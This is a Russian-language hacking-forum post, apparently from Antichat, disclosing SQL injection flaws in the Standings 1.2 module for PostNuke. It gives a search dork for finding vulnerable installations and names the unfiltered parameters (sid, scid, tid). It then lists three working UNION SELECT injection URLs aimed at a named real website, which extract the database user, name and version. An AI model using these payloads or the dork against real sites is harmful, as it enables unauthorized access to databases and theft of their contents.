|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами:
9593606
Репутация:
4915
|
|
PostNuke. Модуль: Standings множественные SQL
Уязвимый продукт: Модуль: Standings
Версия: 1.2
Дорк: "inurl:module=Standings"
Условие: "нет"
Уязвимый кусок кода:
Полное отсутствие фильтрации, если приводить код, то весь 
Уязвимые параметры sid,scid,tid и т.д
Примеры уязвимостей:
http://www.usffl.info/old/index.php?module=Standings&func=displayteam&cid=3& sid=3&tid=-11+union+select+1,concat_ws(0x3a,User(),Database() ,Version()),3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,1 8,19/*
http://www.usffl.info/old/index.php?module=Standings&func=displaygame&cid=3& sid=3&scid=-263+union+select+1,2,3,4,5,6,concat_ws(0x3a,User() ,Database(),Version()),8,9,0/*
http://www.usffl.info/old/index.php?module=Standings&func=displaygame&cid=3& sid=-3+union+select+1,concat_ws(0x3a,User(),Database(), Version()),3,4,5/*
и т.д.
|